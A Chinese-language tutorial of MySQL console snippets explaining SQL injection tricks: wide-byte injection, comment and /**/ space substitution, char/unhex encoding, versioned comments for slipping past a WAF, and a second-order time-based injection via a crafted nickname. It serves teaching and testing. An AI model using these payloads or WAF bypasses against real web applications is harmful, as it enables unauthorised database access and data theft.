sql注入時易被忽略的語法技巧以及二次注入

那些容易被忽略、容易被弄錯的地方

 

sql注入時的技巧
=========================================================================
*	若是單引號被轉義，在當前數據庫採用GBK編碼的前提下，能夠考慮雙字節注入。

*	註釋符的正確用法
		「-- 」纔是mysql中的註釋，注意後面有個空格
		mysql> select  user()  from (select 1)x where  '1'='1';-- '
		+----------------+
		| user()         |
		+----------------+
		| root@localhost |
		+----------------+
		1 row in set (0.00 sec)

		「#」註釋，後面接不接空格無所謂
		mysql> select  user()  from (select 1) x where  '1'='1';#'
		+----------------+
		| user()         |
		+----------------+
		| root@localhost |
		+----------------+
		1 row in set (0.00 sec)

*	用/**/替代空格
		mysql> select/**/1;
		+---+
		| 1 |
		+---+
		| 1 |
		+---+
		1 row in set (0.00 sec)

*	sql語句中字符串轉義
	-	mysql> select char(32,47,116,109,112,47,102,95,117,115,101,114,46,116,120,116 );
		+-------------------------------------------------------------------+
		| char(32,47,116,109,112,47,102,95,117,115,101,114,46,116,120,116 ) |
		+-------------------------------------------------------------------+
		|  /tmp/f_user.txt                                                  |
		+-------------------------------------------------------------------+
		1 row in set (0.00 sec)


	-	mysql>  select  concat(char(32),char(47),char(116),char(109),char(112),char(47),char(102),char(95),char(117),char(115),char(101),char(114),char(46),char(116),char(120),char(116) ) ;
		+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
		| concat(char(32),char(47),char(116),char(109),char(112),char(47),char(102),char(95),char(117),char(115),char(101),char(114),char(46),char(116),char(120),char(116) ) |
		+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
		|  /tmp/f_user.txt                                                                                                                                                    |
		+---------------------------------------------------------------------------------------------------------------------------------------------------------------------+
		1 row in set (0.00 sec)

		# utf-8
	-	mysql> select unhex('E6B8B8E5AEA2');                                                                                                                                             
		+-----------------------+
		| unhex('E6B8B8E5AEA2') |
		+-----------------------+
		| 遊客                  |
		+-----------------------+
		1 row in set (0.00 sec)

		

*	數字和字符的比較，相似php中的弱類型
	-	mysql> select '10asfasfdeasdfasdf'=10;
		+-------------------------+
		| '10asfasfdeasdfasdf'=10 |
		+-------------------------+
		|                       1 |
		+-------------------------+
	
	-	mysql> select '0esfsadf'=0;
		+--------------+
		| '0esfsadf'=0 |
		+--------------+
		|            1 |
		+--------------+

*	繞過安全狗
	**	正則繞過
		-	select 1/*!50000union/*!*//*!50000select/*!*/2;
				+---+
				| 1 |
				+---+
				| 1 |
				| 2 |
				+---+

		-	mysql> select/*/#\*/1;
				+---+
				| 1 |
				+---+
				| 1 |
				+---+
				1 row in set (0.00 sec)


*	多個單引號相連時，最外層兩個孤獨單引號配對閉合，中間的連續偶數個單引號中每兩個一組換算成一個。
	-	mysql> select '123''';
			+------+
			| 123' |
			+------+
			| 123' |
			+------+
			1 row in set (0.00 sec)

	-	mysql> select '123''''';
			+-------+
			| 123'' |
			+-------+
			| 123'' |
			+-------+
	
	-	mysql> select user from mysql.user where user='nickname'' and password=' or sleep(0.1);#'
			Empty set (1.00 sec)
		此特色能夠引起「二次注入」，好比，註冊用戶時輸入暱稱{nickname'}，被轉義爲{nickname\'}但在插入到數據庫後被還原，
		那麼在須要將暱稱做爲查詢條件的頁面中就存在二次注入，另外一個條件字段的值爲{ or 0=sleep(1);#}便可觸發。